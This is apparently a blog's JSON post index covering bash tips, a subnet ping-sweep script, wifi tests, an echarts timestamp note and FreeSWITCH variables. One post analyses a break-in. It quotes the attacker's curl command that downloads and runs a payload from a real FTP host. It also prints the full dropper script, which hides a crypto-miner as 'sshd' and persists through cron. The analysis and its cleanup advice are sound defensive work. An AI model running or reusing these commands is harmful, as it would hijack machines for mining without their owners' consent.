var2 Less than (in ASCII alphabetical order.) var \u0026gt; var2 Greater than (in ASCII alphabetical order.) 算数操作 赋值 Operators What does it do? = Initialize or change the value of a variable. 算数 Operators What does it do? + Addition - Subtraction * Multiplication / Division ** Exponentiation % Modulo += Plus-Equal (Increment a variable.) -= Minus-Equal (Decrement a variable.) *= Times-Equal (Multiply a variable.) /= Slash-Equal (Divide a variable.) %= Mod-Equal (Remainder of dividing a variable.) 位操作 Operators What does it do? \u0026lt;\u0026lt; Bitwise Left Shift \u0026lt;\u0026lt;= Left-Shift-Equal \u0026gt;\u0026gt; Bitwise Right Shift \u0026gt;\u0026gt;= Right-Shift-Equal \u0026amp; Bitwise AND \u0026amp;= Bitwise AND-Equal | Bitwise OR |= Bitwise OR-Equal ~ Bitwise NOT ^ Bitwise XOR ^= Bitwise XOR-Equal 逻辑 Operators What does it do? ! NOT \u0026amp;\u0026amp; AND || OR Miscellaneous Operators What does it do? 
Example , Comma Separator ((a=1,b=2,c=3)) ARITHMETIC Simpler syntax to set variables # Simple math ((var=1+2)) # Decrement/Increment variable ((var++)) ((var--)) ((var+=1)) ((var-=1)) # Using variables ((var=var2*arr[2])) Ternary Tests # Set the value of var to var2 if var2 is greater than var. # var: variable to set. # var2\u0026gt;var: Condition to test. # ?var2: If the test succeeds. # :var: If the test fails. ((var=var2\u0026gt;var?var2:var)) TRAPS Traps allow a script to execute code on various signals. In pxltrm (a pixel art editor written in bash) traps are used to redraw the user interface on window resize. Another use case is cleaning up temporary files on script exit.\nTraps should be added near the start of scripts so any early errors are also caught.\nNOTE: For a full list of signals, see trap -l.\nDo something on script exit # Clear screen on script exit. trap \u0026#39;printf \\\\e[2J\\\\e[H\\\\e[m\u0026#39; EXIT Ignore terminal interrupt (CTRL+C, SIGINT) trap \u0026#39;\u0026#39; INT React to window resize # Call a function on window resize. trap \u0026#39;code_here\u0026#39; SIGWINCH Do something before every command trap \u0026#39;code_here\u0026#39; DEBUG Do something when a shell function or a sourced file finishes executing trap \u0026#39;code_here\u0026#39; RETURN PERFORMANCE Disable Unicode If unicode is not required, it can be disabled for a performance increase. Results may vary however there have been noticeable improvements in neofetch and other programs.\n# Disable unicode. LC_ALL=C LANG=C OBSOLETE SYNTAX Shebang Use #!/usr/bin/env bash instead of #!/bin/bash.\nThe former searches the user\u0026rsquo;s PATH to find the bash binary. The latter assumes it is always installed to /bin/ which can cause issues. NOTE: There are times when one may have a good reason for using #!/bin/bash or another direct path to the binary.\n# Right: #!/usr/bin/env bash # Less right: #!/bin/bash Command Substitution Use $() instead of backticks.\n# Right. 
var=\u0026#34;$(command)\u0026#34; # Wrong. var=`command` # $() can easily be nested whereas `` cannot. var=\u0026#34;$(command \u0026#34;$(command)\u0026#34;)\u0026#34; Function Declaration Do not use the function keyword, it reduces compatibility with older versions of bash.\n# Right. do_something() { # ... } # Wrong. function do_something() { # ... } INTERNAL VARIABLES Get the location to the bash binary \u0026#34;$BASH\u0026#34; Get the version of the current running bash process # As a string. \u0026#34;$BASH_VERSION\u0026#34; # As an array. \u0026#34;${BASH_VERSINFO[@]}\u0026#34; Open the user\u0026rsquo;s preferred text editor \u0026#34;$EDITOR\u0026#34; \u0026#34;$file\u0026#34; # NOTE: This variable may be empty, set a fallback value. \u0026#34;${EDITOR:-vi}\u0026#34; \u0026#34;$file\u0026#34; Get the name of the current function # Current function. \u0026#34;${FUNCNAME[0]}\u0026#34; # Parent function. \u0026#34;${FUNCNAME[1]}\u0026#34; # So on and so forth. \u0026#34;${FUNCNAME[2]}\u0026#34; \u0026#34;${FUNCNAME[3]}\u0026#34; # All functions including parents. \u0026#34;${FUNCNAME[@]}\u0026#34; Get the host-name of the system \u0026#34;$HOSTNAME\u0026#34; # NOTE: This variable may be empty. # Optionally set a fallback to the hostname command. \u0026#34;${HOSTNAME:-$(hostname)}\u0026#34; Get the architecture of the Operating System \u0026#34;$HOSTTYPE\u0026#34; Get the name of the Operating System / Kernel This can be used to add conditional support for different OperatingSystems without needing to call uname.\n\u0026#34;$OSTYPE\u0026#34; Get the current working directory This is an alternative to the pwd built-in.\n\u0026#34;$PWD\u0026#34; Get the number of seconds the script has been running \u0026#34;$SECONDS\u0026#34; Get a pseudorandom integer Each time $RANDOM is used, a different integer between 0 and 32767 is returned. 
This variable should not be used for anything related to security (this includes encryption keys etc).\n\u0026#34;$RANDOM\u0026#34; INFORMATION ABOUT THE TERMINAL Get the terminal size in lines and columns (from a script) This is handy when writing scripts in pure bash and stty/tput can’t be called.\nExample Function:\nget_term_size() { # Usage: get_term_size # (:;:) is a micro sleep to ensure the variables are # exported immediately. shopt -s checkwinsize; (:;:) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$LINES $COLUMNS\u0026#34; } Example Usage:\n# Output: LINES COLUMNS $ get_term_size 15 55 Get the terminal size in pixels CAVEAT: This does not work in some terminal emulators.\nExample Function:\nget_window_size() { # Usage: get_window_size printf \u0026#39;%b\u0026#39; \u0026#34;${TMUX:+\\\\ePtmux;\\\\e}\\\\e[14t${TMUX:+\\\\e\\\\\\\\}\u0026#34; IFS=\u0026#39;;t\u0026#39; read -d t -t 0.05 -sra term_size printf \u0026#39;%s\\n\u0026#39; \u0026#34;${term_size[1]}x${term_size[2]}\u0026#34; } Example Usage:\n# Output: WIDTHxHEIGHT $ get_window_size 1200x800 # Output (fail): $ get_window_size x Get the current cursor position This is useful when creating a TUI in pure bash.\nExample Function:\nget_cursor_pos() { # Usage: get_cursor_pos IFS=\u0026#39;[;\u0026#39; read -p $\u0026#39;\\e[6n\u0026#39; -d R -rs _ y x _ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$x $y\u0026#34; } Example Usage:\n# Output: X Y $ get_cursor_pos 1 8 CONVERSION Convert a hex color to RGB Example Function:\nhex_to_rgb() { # Usage: hex_to_rgb \u0026#34;#FFFFFF\u0026#34; # hex_to_rgb \u0026#34;000000\u0026#34; : \u0026#34;${1/\\#}\u0026#34; ((r=16#${_:0:2},g=16#${_:2:2},b=16#${_:4:2})) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$r $g $b\u0026#34; } Example Usage:\n$ hex_to_rgb \u0026#34;#FFFFFF\u0026#34; 255 255 255 Convert an RGB color to hex Example Function:\nrgb_to_hex() { # Usage: rgb_to_hex \u0026#34;r\u0026#34; \u0026#34;g\u0026#34; \u0026#34;b\u0026#34; printf 
\u0026#39;#%02x%02x%02x\\n\u0026#39; \u0026#34;$1\u0026#34; \u0026#34;$2\u0026#34; \u0026#34;$3\u0026#34; } Example Usage:\n$ rgb_to_hex \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; \u0026#34;255\u0026#34; #FFFFFF CODE GOLF Shorter for loop syntax # Tiny C Style. for((;i++\u0026lt;10;)){ echo \u0026#34;$i\u0026#34;;} # Undocumented method. for i in {1..10};{ echo \u0026#34;$i\u0026#34;;} # Expansion. for i in {1..10}; do echo \u0026#34;$i\u0026#34;; done # C Style. for((i=0;i\u0026lt;=10;i++)); do echo \u0026#34;$i\u0026#34;; done Shorter infinite loops # Normal method while :; do echo hi; done # Shorter for((;;)){ echo hi;} Shorter function declaration # Normal method f(){ echo hi;} # Using a subshell f()(echo hi) # Using arithmetic # This can be used to assign integer values. # Example: f a=1 # f a++ f()(($1)) # Using tests, loops etc. # NOTE: ‘while’, ‘until’, ‘case’, ‘(())’, ‘[[]]’ can also be used. f()if true; then echo \u0026#34;$1\u0026#34;; fi f()for i in \u0026#34;$@\u0026#34;; do echo \u0026#34;$i\u0026#34;; done Shorter if syntax # One line # Note: The 3rd statement may run when the 1st is true [[ $var == hello ]] \u0026amp;\u0026amp; echo hi || echo bye [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi; echo there; } || echo bye # Multi line (no else, single statement) # Note: The exit status may not be the same as with an if statement [[ $var == hello ]] \u0026amp;\u0026amp; echo hi # Multi line (no else) [[ $var == hello ]] \u0026amp;\u0026amp; { echo hi # ... } Simpler case statement to set variable The : built-in can be used to avoid repeating variable= in a case statement. The $_ variable stores the last argument of the last command. : always succeeds so it can be used to store the variable value.\n# Modified snippet from Neofetch. 
case \u0026#34;$OSTYPE\u0026#34; in \u0026#34;darwin\u0026#34;*) : \u0026#34;MacOS\u0026#34; ;; \u0026#34;linux\u0026#34;*) : \u0026#34;Linux\u0026#34; ;; *\u0026#34;bsd\u0026#34;* | \u0026#34;dragonfly\u0026#34; | \u0026#34;bitrig\u0026#34;) : \u0026#34;BSD\u0026#34; ;; \u0026#34;cygwin\u0026#34; | \u0026#34;msys\u0026#34; | \u0026#34;win32\u0026#34;) : \u0026#34;Windows\u0026#34; ;; *) printf \u0026#39;%s\\n\u0026#39; \u0026#34;Unknown OS detected, aborting...\u0026#34; \u0026gt;\u0026amp;2 exit 1 ;; esac # Finally, set the variable. os=\u0026#34;$_\u0026#34; OTHER Use read as an alternative to the sleep command Surprisingly, sleep is an external command and not a bash built-in.\nCAVEAT: Requires bash 4+\nExample Function:\nread_sleep() { # Usage: read_sleep 1 # read_sleep 0.2 read -rt \u0026#34;$1\u0026#34; \u0026lt;\u0026gt; \u0026lt;(:) || : } Example Usage:\nread_sleep 1 read_sleep 0.1 read_sleep 30 For performance-critical situations, where it is not economic to open and close an excessive number of file descriptors, the allocation of a file descriptor may be done only once for all invocations of read:\n(See the generic original implementation at https://blog.dhampir.no/content/sleeping-without-a-subprocess-in-bash-and-how-to-sleep-forever)\nexec {sleep_fd}\u0026lt;\u0026gt; \u0026lt;(:) while some_quick_test; do # equivalent of sleep 0.001 read -t 0.001 -u $sleep_fd done Check if a program is in the user\u0026rsquo;s PATH # There are 3 ways to do this and either one can be used. type -p executable_name \u0026amp;\u0026gt;/dev/null hash executable_name \u0026amp;\u0026gt;/dev/null command -v executable_name \u0026amp;\u0026gt;/dev/null # As a test. if type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is in PATH. fi # Inverse. if ! type -p executable_name \u0026amp;\u0026gt;/dev/null; then # Program is not in PATH. fi # Example (Exit early if program is not installed). if ! 
type -p convert \u0026amp;\u0026gt;/dev/null; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;error: convert is not installed, exiting...\u0026#34; exit 1 fi Get the current date using strftime Bash’s printf has a built-in method of getting the date which can be used in place of the date command.\nCAVEAT: Requires bash 4+\nExample Function:\ndate() { # Usage: date \u0026#34;format\u0026#34; # See: \u0026#39;man strftime\u0026#39; for format. printf \u0026#34;%($1)T\\\\n\u0026#34; \u0026#34;-1\u0026#34; } Example Usage:\n# Using above function. $ date \u0026#34;%a %d %b - %l:%M %p\u0026#34; Fri 15 Jun - 10:00 AM # Using printf directly. $ printf \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#34;-1\u0026#34; Fri 15 Jun - 10:00 AM # Assigning a variable using printf. $ printf -v date \u0026#39;%(%a %d %b - %l:%M %p)T\\n\u0026#39; \u0026#39;-1\u0026#39; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$date\u0026#34; Fri 15 Jun - 10:00 AM Get the username of the current user CAVEAT: Requires bash 4.4+\n$ : \\\\u # Expand the parameter as if it were a prompt string. 
$ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${_@P}\u0026#34; black Generate a UUID V4 CAVEAT: The generated value is not cryptographically secure.\nExample Function:\nuuid() { # Usage: uuid C=\u0026#34;89ab\u0026#34; for ((N=0;N\u0026lt;16;++N)); do B=\u0026#34;$((RANDOM%256))\u0026#34; case \u0026#34;$N\u0026#34; in 6) printf \u0026#39;4%x\u0026#39; \u0026#34;$((B%16))\u0026#34; ;; 8) printf \u0026#39;%c%x\u0026#39; \u0026#34;${C:$RANDOM%${#C}:1}\u0026#34; \u0026#34;$((B%16))\u0026#34; ;; 3|5|7|9) printf \u0026#39;%02x-\u0026#39; \u0026#34;$B\u0026#34; ;; *) printf \u0026#39;%02x\u0026#39; \u0026#34;$B\u0026#34; ;; esac done printf \u0026#39;\\n\u0026#39; } Example Usage:\n$ uuid d5b6c731-1310-4c24-9fe3-55d556d44374 Progress bars This is a simple way of drawing progress bars without needing a for loop in the function itself.\nExample Function:\nbar() { # Usage: bar 1 10 # ^----- Elapsed Percentage (0-100). # ^-- Total length in chars. ((elapsed=$1*$2/100)) # Create the bar with spaces. printf -v prog \u0026#34;%${elapsed}s\u0026#34; printf -v total \u0026#34;%$(($2-elapsed))s\u0026#34; printf \u0026#39;%s\\r\u0026#39; \u0026#34;[${prog// /-}${total}]\u0026#34; } Example Usage:\nfor ((i=0;i\u0026lt;=100;i++)); do # Pure bash micro sleeps (for the example). (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) \u0026amp;\u0026amp; (:;:) # Print the bar. 
bar \u0026#34;$i\u0026#34; \u0026#34;10\u0026#34; done printf \u0026#39;\\n\u0026#39; Get the list of functions in a script get_functions() { # Usage: get_functions IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra functions \u0026lt; \u0026lt;(declare -F) printf \u0026#39;%s\\n\u0026#39; \u0026#34;${functions[@]//declare -f }\u0026#34; } Bypass shell aliases # alias ls # command # shellcheck disable=SC1001 \\ls Bypass shell functions # function ls # command command ls 后台运行命令 This will run the given command and keep it running, even after the terminal or SSH connection is terminated. All output is ignored.\nbkr() { (nohup \u0026#34;$@\u0026#34; \u0026amp;\u0026gt;/dev/null \u0026amp;) } bkr ./some_script.sh # some_script.sh is now running in the background AFTERWORD Thanks for reading! If this bible helped you in any way and you\u0026rsquo;d like to give back, consider donating. Donations give me the time to make this the best resource possible. Can\u0026rsquo;t donate? That\u0026rsquo;s OK, star the repo and share it with your friends!\n","permalink":"https://wdd.js.org/shell/pure-bash-bible/","summary":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! 
if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.","title":"pure-bash-bible"},{"content":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? -eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.2\n用 fping 去执行,同样 256 个主机,只需要 5-6s\nfping -g 192.168.1.0/24 -r 1 -a -s ","permalink":"https://wdd.js.org/shell/list-active-host/","summary":"使用 ping 优点 原生,不用安装软件 缺点 速度慢 下面的脚本列出 192.168.1.0/24 的所有主机,大概需要 255 秒\n#!/bin/bash function handler () { echo \u0026#34;will exit\u0026#34; exit 0 } trap \u0026#39;handler\u0026#39; SIGINT for ip in 192.168.1.{1..255} do ping -W 1 -c 1 $ip \u0026amp;\u0026gt; /dev/null if [ $? 
-eq 0 ]; then echo $ip is alive else echo $ip is dead fi done 使用 fping 优点 速度快 缺点 需要安装 fping # 安装fping brew install fping # mac yum install fping # centos apt install fping # debian 我用的 fping 是 MacOS X, fping 的版本是 4.","title":"列出网络中活动的主机"},{"content":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,sshd.tgz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.supportxmr.com门罗币的矿池 # 所以大家应该清楚了,入侵的机器应该用来挖矿的 # 这一步是测试本机与矿池dns是否通 if [ $(ping -c 1 pool.supportxmr.com 2\u0026gt;/dev/null|grep \u0026#34;bytes of data\u0026#34; | wc -l ) -gt \u0026#39;0\u0026#39; ]; then dns=\u0026#34;\u0026#34; # dns通 else dns=\u0026#34;-d\u0026#34; # dns不通 fi # 删除用户计划任务,并将报错信息清除 crontab -r 2\u0026gt;/dev/null # 这一步不太懂 rm -rf /tmp/.lock 2\u0026gt;/dev/null # 设置当前进程的名字,为了掩人耳目,起个sshd, 鱼目混珠 EXEC=\u0026#34;sshd\u0026#34; # 获取当前目录 DIR=`pwd` # 获取参数个数 # 这个程序传了一个 -r 参数,所以$#的值是1 if [ \u0026#34;$#\u0026#34; == \u0026#34;0\u0026#34; ];\tthen ARGS=\u0026#34;\u0026#34; else # 遍历每一个参数 for var in \u0026#34;$@\u0026#34; do if [ \u0026#34;$var\u0026#34; != \u0026#34;-f\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $var\u0026#34; # $var不是-f, 所以ARGS被设置为-r fi if [ ! -z \u0026#34;$FAKEPROC\u0026#34; ];\tthen FAKEPROC=$((FAKEPROC+1)) # 这里不会执行,因为$FAKEPROC是空字符串 fi if [ \u0026#34;$var\u0026#34; == \u0026#34;-h\u0026#34; ];\tthen FAKEPROC=\u0026#34;1\u0026#34; # 这里也不会执行 fi if [[ \u0026#34;$FAKEPROC\u0026#34; == \u0026#34;2\u0026#34; ]];\tthen EXEC=\u0026#34;$var\u0026#34; # 这里也不会执行 fi if [ ! 
-z \u0026#34;$dns\u0026#34; ];\tthen ARGS=\u0026#34;$ARGS $dns\u0026#34; # 如果本机与矿池dns通,则这里不会执行 fi done fi # 创建目录 mkdir -- \u0026#34;.$EXEC\u0026#34; #创建 .sshd目录 cp -f -- `uname -m` \u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; # uname -m获取系统架构,然后判断要把i686还是x86_64拷贝到.sshd目录, 并重命名为sshd ./\u0026#34;.$EXEC\u0026#34;/\u0026#34;$EXEC\u0026#34; $ARGS -f -c # 执行改名后的文件 rm -rf \u0026#34;.$EXEC\u0026#34; # 生成后续执行的脚本 echo \u0026#34;#!/bin/bash cd -- $DIR mkdir -- .$EXEC cp -f -- `uname -m` .$EXEC/$EXEC ./.$EXEC/$EXEC $ARGS -c rm -rf .$EXEC\u0026#34; \u0026gt; \u0026#34;$EXEC\u0026#34; chmod +x -- \u0026#34;$EXEC\u0026#34; # 执行脚本 ./\u0026#34;$EXEC\u0026#34; # 生成计划任务执行脚本 (echo \u0026#34;* * * * * `pwd`/$EXEC\u0026#34;) | sort - | uniq - | crontab - # 删除go脚本 rm -rf go 上文的脚本中,有许多命令后跟着 -- 和 - 。其中 -- 用来标记命令行选项已经结束,其后的内容一律按普通参数处理;而 - 通常表示从标准输入读取。\n由于 x86_64 和 i686 是可执行文件,就不分析了。\n恶意文件清除 清除 crontab 定时任务 清除可执行文件。可以 ll /proc/pid/exe , 看下恶意进程的可执行文件位置 kill 恶意程序的进程 修改 root 密码 如何防护 使用强密码,至少 32 位 使用 ssh key 登录 有些脚本会把名字伪装成系统服务,所以不要被进程的名字迷惑,而应该看看这个进程使用的资源是否合理。一个 sshd 的进程,正常来说占用 cpu 和内存不会超过 1%。如果你发现一个占用 CPU%的 sshd 进程,你就要小心这东西是不是滥竽充数了。 ","permalink":"https://wdd.js.org/shell/evil-script/","summary":"机器被入侵了,写点东西,分析一下入侵脚本,顺便也学习一下。\nbash -c curl -O ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz;tar xvf sshd.tgz;rm -rf sshd.tgz;cd .ssd;chmod +x *;./go -r 下载恶意软件 恶意软件是使用 ftp 下载的, 地址是:ftp://noji:noji2012@153.122.137.67/.kde/sshd.tgz,这个 153.122.137.67 IP 是位于日本东京,sshd.tgz 是一个 tar 包,用 tar 解压之后,出现一个 sh 文件,两个可执行文件。\n-rwxr-xr-x 1 1001 1001 907 Nov 20 20:58 go # shell -rwxrwxr-x 1 1001 1001 1.3M Nov 20 21:06 i686 # 可执行 -rwxrwxr-x 1 1001 1001 1.1M Nov 20 21:06 x86_64 # 可执行 分析可执行文件 go go 是一个 shell 程序,下文是分析\n#!/bin/bash # pool.","title":"入侵脚本分析 - 瞒天过海"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/drkxqu/","summary":"","title":"进程实战"},{"content":"","permalink":"https://wdd.js.org/posts/2019/12/caytlk/","summary":"","title":"docker slim"},{"content":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn 
mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准\nmixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。\n","permalink":"https://wdd.js.org/posts/2019/12/mgyw98/","summary":"路由器无线网络的模式有11b only ,11g only, 11n only,11bg mixed,11bgn mixed\n11b:就是11M 11g:就是54M 11n:就是150M或者300M only:在此模式下,频道仅使用 802.11b标准\nmixed:支持混合 802.11b 和 802.11g 装置\n修改路由器工作模式后,手机连接wifi,然后用腾讯手机管家对WiFi测速\n工作模式 下载速度 11b 200kb/s 11g 400kb/s 11n 1.1MB/s 11bgn mixed 2.06MB/s 所以,选择11bgn是个不错的选择。","title":"wifi工作模式测试"},{"content":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echarts的bug\n解决方案,查询时设置epoch=s, 用unix秒数来格式化时间\n","permalink":"https://wdd.js.org/posts/2019/12/nolg61/","summary":"var data = [] var t1 = [ [\u0026#34;2019-12-11T09:13:06.078545239Z\u0026#34;,153], [\u0026#34;2019-12-11T09:14:06.087484224Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07.723571286Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09.534879791Z\u0026#34;,249], ] var t2 = [ [\u0026#34;2019-12-11T09:13:06Z\u0026#34;,153], 
[\u0026#34;2019-12-11T09:14:06Z\u0026#34;,118], [\u0026#34;2019-12-11T09:15:07Z\u0026#34;,198], [\u0026#34;2019-12-11T09:16:09Z\u0026#34;,249], ] var data = t1.map(function(item){ return { value: [item[0], item[1]] } }) option = { title: { text: \u0026#39;动态数据 + 时间坐标轴\u0026#39; }, tooltip: { trigger: \u0026#39;axis\u0026#39; }, xAxis: { type: \u0026#39;time\u0026#39; }, yAxis: { type: \u0026#39;value\u0026#39; }, series: [{ name: \u0026#39;模拟数据\u0026#39;, type: \u0026#39;line\u0026#39;, showSymbol: false, hoverAnimation: false, data: data }] }; 数据集t1时间精度到秒,并且带9位小数 数据集t2时间精确到秒,不带小数 t1的绘线出现往回拐,明显有问题。不知道这是不是echarts的bug","title":"influxdb时间精度到秒"},{"content":"\nAbout Channel variables are used to manipulate dialplan execution, to control call progress, and to provide options to applications. They play a pervasive role, as FreeSWITCH™ frequently consults channel variables as a way to customize processing prior to a channel\u0026rsquo;s creation, during call progress, and after the channel hangs up.\nVariable Expansion We rely on variable expansion to create flexible, reusable dialplans:\n$${variable} is expanded once when FreeSWITCH™ first parses the configuration on startup or after invoking reloadxml. It is suitable for variables that do not change, such as the domain of a single-tenant FreeSWITCH™ server. That is why $${domain} is referenced so frequently in the vanilla dialplan examples. ${variable} is expanded during each pass through the dialplan, so it is used for variables that are expected to change, such as the ${destination_number} or ${sip_to_user} fields. 
Channel Variables in the XML Dialplan Channel variables are set, appropriately enough, with the set application:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;var_name=var value\u0026rdquo;/\u0026gt; Reading channel variables requires the ${} syntax:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO The value in the var_name chan var is ${var_name}\u0026rdquo;/\u0026gt;\u0026lt;condition field=\u0026quot;${var_name}\u0026quot; expression=\u0026ldquo;some text\u0026rdquo;\u0026gt; Scoped Variables Channel variables used to be global to the session. As of b2c3199f, it is possible to set variables that only exist within a single application execution and any subsequent applications under it. For example, applications can use scoped variables for named input params:\n\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026quot;%[myvar=Hello]INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026quot;/\u0026gt;\u0026lt;action application=\u0026ldquo;log\u0026rdquo; data=\u0026ldquo;INFO myvar is \u0026lsquo;${myvar}\u0026rsquo;\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;myapp\u0026rdquo; data=\u0026quot;%[var1=val1,var2=val2]mydata\u0026quot;/\u0026gt; Channel Variables in Dial Strings The variable assignment syntax for dial strings differs depending on which scope they should apply to:\n{foo=bar} is only valid at the beginning of the dial string. It will set the same variables on every channel, but does not do so for enterprise bridging/originate. \u0026lt;foo=bar\u0026gt; is only valid at the beginning of a dial string. It will set the same variables on every channel, including all those in an enterprise bridging/originate. [foo=bar] goes before each individual dial string and will set the variable values specified for only this channel. 
Examples: Set the foo variable for all channels involved; chan=1 will only be set for blah, while chan=2 will only be set for blah2:\n{foo=bar}[chan=1]sofia/default/blah@baz.com,[chan=2]sofia/default/blah2@baz.com Set multiple variables by delimiting with commas:\n[var1=abc,var2=def,var3=ghi]sofia/default/blah@baz.com To have variables in [] override variables in {}, set local_var_clobber=true inside {}. You must also set local_var_clobber=true when you want to override channel variables that have been exported to your b-legs in your dialplan. In this example, the legs for blah1@baz.com and johndoe@example.com would be set to offer SRTP (RTP/SAVP) while janedoe@acme.com would not receive an SRTP offer (she would see RTP/AVP instead):\n{local_var_clobber=true,rtp_secure_media=true}sofia/default/blah1@baz.com|sofia/default/johndoe@example.com|[rtp_secure_media=false]sofia/default/janedoe@acme.com Escaping/Redefining Delimiters Commas are the default delimiter inside variable assignment tags. In some cases (like in absolute_codec_string), we may need to define variables whose values contain literal commas that should not be interpreted as delimiters. We can redefine the delimiter for a variable using ^^ followed by the desired delimiter:\n^^;one,two,three;four,five,six;seven,eight,nine To set absolute_codec_string=PCMA@8000h@20i@64000b,PCMU@8000h@20i@64000b,G729@8000h@20i@8000b in a dial string:\n{absolute_codec_string=^^:PCMA@8000h@20i@64000b:PCMU@8000h@20i@64000b:G729@8000h@20i@8000b,leg_time_out=10,process_cdr=b_only} This approach does not work when setting sip_h_, sip_rh_, and sip_ph headers. To pass a comma into the contents of a private header, escape the comma with a backslash:\n{sip_h_X-My-Header=one\\,two\\,three,leg_time_out=10,process_cdr=b_only} Exporting Channel Variables in Bridge Operations Variables from one call leg (A) can be exported to the other call leg (B) by using the export_vars variable. 
Its value is a comma separated list of variables that should propagate across calls.\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;export_vars=myvar,myvar2,foo,bar\u0026rdquo;/\u0026gt; To set a variable on the A-leg and add it to the export list, use the export application:\n\u0026lt;action application=\u0026ldquo;export\u0026rdquo; data=\u0026ldquo;myvar=true\u0026rdquo;/\u0026gt; Using Channel Variables in Dialplan Condition Statements Channel variables can be used in conditions; refer to XML Dialplan Conditions for more information. Some channel variables may not be set during the dialplan parsing phase. See Inline Actions. Custom Channel Variables We are not constrained to the channel variables that FreeSWITCH™, its modules, and applications define. It is possible to set any number of unique channel variables for any purpose. They can also be logged in CDR. The set application can be used to set any channel variable:\n\u0026lt;action application=\u0026ldquo;set\u0026rdquo; data=\u0026ldquo;lead_id=2e4b5966-0aaf-11e8-ba89-0ed5f89f718b\u0026rdquo;/\u0026gt;\u0026lt;action application=\u0026ldquo;set\u0026rdquo; 